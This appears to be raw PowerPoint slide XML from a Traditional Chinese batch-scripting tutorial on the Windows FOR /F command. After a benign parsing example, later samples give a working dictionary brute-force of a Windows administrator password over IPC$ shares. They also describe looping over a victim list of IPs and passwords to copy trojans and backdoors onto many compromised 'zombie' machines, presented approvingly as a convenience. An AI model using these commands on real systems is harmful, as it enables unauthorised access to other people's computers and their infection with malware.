            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指一個行註釋字符的結尾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>就一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>skip=n - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指在文件開始時忽略的行數。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>delims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=xxx - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指分隔符集。這個替換了空格和跳格鍵的</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>默認分隔符集。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>tokens=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>x,y,m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-n - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指每行的哪一個符號被傳遞到每個迭代</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>本身。這會導致額外變量名稱的</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>格式為一個範圍。通過 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>nth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>符號指定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>符號字符串中的最後一個字符星號，那麼額外的變量將在最後一個符號解析之分配並接受行的保留文本。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>usebackq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定新語法已在下類情況中使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在作為命令執行一個後引號的字符串並且引號字符為文字字符串命令並允許在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中使用雙引號擴起文件名稱。</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sample1:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR /F \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>eol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=; tokens=2,3* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>delims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=, \ %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in (myfile.txt) do command</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48032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04B79F-8AE9-4AB8-8F71-29E8FBFDAF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="555812"/>
            <a:ext cx="10515600" cy="5621151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>sample2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令來實現對一台目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Win2k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>主機的暴力密碼破解。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>我們用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>net use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\ip\ipc$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> \password\ /u:\administrator\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>來嘗試這和目標主機進行連接</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，當成功時記下密碼。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>最主要的命令是一條：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for /f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>% in (dict.txt) do net use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\ip\ipc$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%\ /u:\administrator\</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>來表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的密碼，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>dict.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中這個取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的值用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>net use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令來連接。然後將程序運行結果傳遞給</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令－－</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for /f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%% in (dict.txt) do net use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\ip\ipc$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%%\ /u:\administrator\|find \:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令成功完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>\&gt;&gt;D:\ok.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，這樣就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>了。</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sample3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</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你有沒有過手裡有大量肉雞等著你去種後門＋木馬呢？，當數量特別多的時候，原本很開心</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的一件事都會變得很鬱悶：）。文章開頭就談到使用批處理文件，可以簡化日常或重複性任</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>務。那麼如何實現呢？呵呵，看下去你就會明白了。</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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>主要命令也只有一條：（在批處理文件中使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令時，指定變量使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%%variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@for /f \tokens=1,2,3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>delims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>= \ %%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in (victim.txt) do start call door.bat %%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%j %%k</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的用法請參見上面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>sample1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，在這裡它表示按順序將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>victim.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中的內容傳遞給</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>doo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中的參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> %j %k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cultivate.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>無非就是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>net use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令來建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>連接，並</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>木馬＋後門到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，然</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後用返回碼（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）來篩選成功種植後門的主機，並</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>出來，或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到指</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>定的文件。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>delims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vivtim.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中的內容是一空格來分隔的。我想看到這裡你也一定明白這</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>..txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>裡的內容是什麼樣的了。應該根據</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> %%j %%k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示的對象來排列，一般就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>passw</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262667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04B79F-8AE9-4AB8-8F71-29E8FBFDAF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="555812"/>
            <a:ext cx="10515600" cy="5621151"/>
          </a:xfrm>
